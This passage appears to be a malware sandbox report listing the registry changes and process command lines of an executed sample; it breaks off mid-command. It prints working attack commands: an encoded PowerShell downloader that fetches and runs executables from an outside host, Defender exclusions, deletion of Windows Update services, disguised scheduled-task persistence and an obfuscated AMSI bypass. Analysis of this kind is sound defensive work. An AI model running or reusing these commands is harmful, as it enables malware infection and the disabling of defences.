| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1180 -ip 1180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 252
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4800 -ip 4800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 284
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:MyfbqrCXrmwZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uyDhWjwvEmYXUg,[Parameter(Position=1)][Type]$lZcsLXjbXn)$EwfieYKsAXF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+'te'+[Char](100)+''+[Char](68)+'e'+'l'+'eg'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'','Cl'+[Char](97)+'ss'+','+'P'+'u'+'b'+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+','+[Char](65)+''+'n'+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'to'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$EwfieYKsAXF.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$uyDhWjwvEmYXUg).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$EwfieYKsAXF.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$lZcsLXjbXn,$uyDhWjwvEmYXUg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $EwfieYKsAXF.CreateType();}$RyqgUXoDEYAxx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+'s'+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+'n'+''+'3'+'2.'+[Char](85)+'ns'+[Char](97)+''+[Char](102)+'e'+[Char](82)+'y'+[Char](113)+''+[Char](103)+''+[Char](85)+''+[Char](88)+''+[Char](111)+''+[Char](68)+''+[Char](69)+'Y'+[Char](65)+'x'+'x'+'');$UJGIUoCkigcZvQ=$RyqgUXoDEYAxx.GetMethod(''+[Char](85)+''+'J'+'G'+'I'+'Uo'+[Char](67)+'k'+[Char](105)+'g'+[Char](99)+''+[Char](90)+''+'v'+''+'Q'+'',[Reflection.BindingFlags]''+'P'+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HFjqbHepdIFClSNZyKy=MyfbqrCXrmwZ @([String])([IntPtr]);$jZaGTnTxzsfqxMRTDVbYUp=MyfbqrCXrmwZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGHFxYLAhGj=$RyqgUXoDEYAxx.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+'2.'+[Char](100)+''+'l'+'l')));$cpogCnenPGAVnv=$UJGIUoCkigcZvQ.Invoke($Null,@([Object]$jGHFxYLAhGj,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+'A'+'')));$cNBTrGBuAoTtVSJWM=$UJGIUoCkigcZvQ.Invoke($Null,@([Object]$jGHFxYLAhGj,[Object]('V'+[Char](105)+'rtu'+[Char](97)+'l'+[Char](80)+''+'r'+''+'o'+''+'t'+''+'e'+''+[Char](99)+'t')));$xznOSyH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cpogCnenPGAVnv,$HFjqbHepdIFClSNZyKy).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+'dl'+'l'+'');$bLdYgJzRIvrYoWjXl=$UJGIUoCkigcZvQ.Invoke($Null,@([Object]$xznOSyH,[Object]('Am'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$EagibRwlVK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cNBTrGBuAoTtVSJWM,$jZaGTnTxzsfqxMRTDVbYUp).Invoke($bLdYgJzRIvrYoWjXl,[uint32]8,4,[ref]$EagibRwlVK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$bLdYgJzRIvrYoWjXl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cNBTrGBuAoTtVSJWM,$jZaGTnTxzsfqxMRTDVbYUp).Invoke($bLdYgJzRIvrYoWjXl,[uint32]8,0x20,[ref]$EagibRwlVK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+'W'+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'rs'+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jnyXNorqFmFo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CxeoJMEHZsuTXm,[Parameter(Position=1)][Type]$GaiTtMjAHz)$SxBlOKdvzlW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+'mo'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+'u'+''+'b'+''+'l'+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+'A'+[Char](110)+''+'s'+'i'+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+',Au'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$SxBlOKdvzlW.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+''+'m'+''+[Char](101)+','+[Char](72)+'id'+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$CxeoJMEHZsuTXm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'age'+[Char](100)+'');$SxBlOKdvzlW.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+'H'+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'wS'+[Char](108)+''+[Char](111)+'t'+[Char](4